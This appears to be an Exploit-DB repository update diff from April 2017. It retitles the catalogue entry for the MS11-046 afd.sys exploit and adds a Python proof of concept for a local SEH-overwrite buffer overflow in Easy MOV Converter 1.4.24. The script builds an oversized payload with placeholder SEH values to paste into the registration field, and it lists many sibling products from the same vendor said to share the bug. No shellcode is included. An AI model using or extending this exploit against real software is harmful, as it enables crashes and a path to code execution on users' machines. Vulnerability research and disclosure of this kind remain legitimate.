DB: 2017-04-25

1 new exploits

Microsoft Windows - 'afd.sys' (PoC) (MS11-046)
Microsoft Windows - 'afd.sys' Local Kernel Exploit (PoC) (MS11-046)

Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)

files.csv

@@ -2177,7 +2177,7 @@ id,file,description,date,author,platform,type,port
 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0
-18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
+18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' Local Kernel Exploit (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0
 18757,platforms/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
@@ -5473,6 +5473,7 @@ id,file,description,date,author,platform,type,port
 41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0
 41905,platforms/multiple/dos/41905.txt,"VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
 41906,platforms/multiple/dos/41906.txt,"VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
+41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0

platforms/windows/dos/41911.py

@@ -0,0 +1,43 @@
+#!/usr/bin/python
+# Exploit Title     : Easy MOV Converter - 'Enter User Name' Field SEH Overwrite POC
+# Date              : 12/03/2017
+# Exploit Author    : Muhann4d
+# Vendor Homepage   : http://www.divxtodvd.net/
+# Software Link     : http://www.divxtodvd.net/easy_mov_converter.exe
+# Tested Version    : 1.4.24
+# Category          : Denial of Service (DoS) Local
+# Tested on OS      : Windows 7 SP1 32bit
+
+# Proof of Concept  : run the exploit, copy the content of poc.txt
+# go to the Register button and in the "Enter User Name" field paste the content of poc.txt and press OK.
+
+# The vendor has been cantacted but no reply
+
+#   All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ 
+#   Easy DVD Creator
+#   Easy MPEG/AVI/DIVX/WMV/RM to DVD
+#   Easy Avi/Divx/Xvid to DVD Burner
+#   Easy MPEG to DVD Burner
+#   Easy WMV/ASF/ASX to DVD Burner
+#   Easy RM RMVB to DVD Burner
+#   Easy CD DVD Copy
+#   MP3/AVI/MPEG/WMV/RM to Audio CD Burner
+#   MP3/WAV/OGG/WMA/AC3 to CD Burner
+#   MP3 WAV to CD Burner
+#   My Video Converter
+#   Easy MOV Converter
+#   Easy AVI DivX Converter
+#   Easy Video to iPod Converter
+#   Easy Video to PSP Converter
+#   Easy Video to 3GP Converter
+#   Easy Video to MP4 Converter
+#   Easy Video to iPod/MP4/PSP/3GP Converter
+
+buffer = "\x41" * 1008
+nSEH = "\x42\x42\x42\x42"
+SEH = "\x43\x43\x43\x43"
+f = open ("poc.txt", "w")
+f.write(buffer + nSEH + SEH)
+f.close()
+
+